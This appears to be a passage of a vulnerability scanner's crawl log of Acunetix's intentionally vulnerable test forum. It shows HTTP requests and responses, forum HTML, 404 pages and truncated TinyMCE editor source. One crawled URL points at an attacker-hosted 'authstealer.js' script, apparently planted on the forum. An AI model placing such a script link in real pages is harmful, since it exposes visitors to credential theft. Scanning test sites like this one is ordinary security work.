AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var 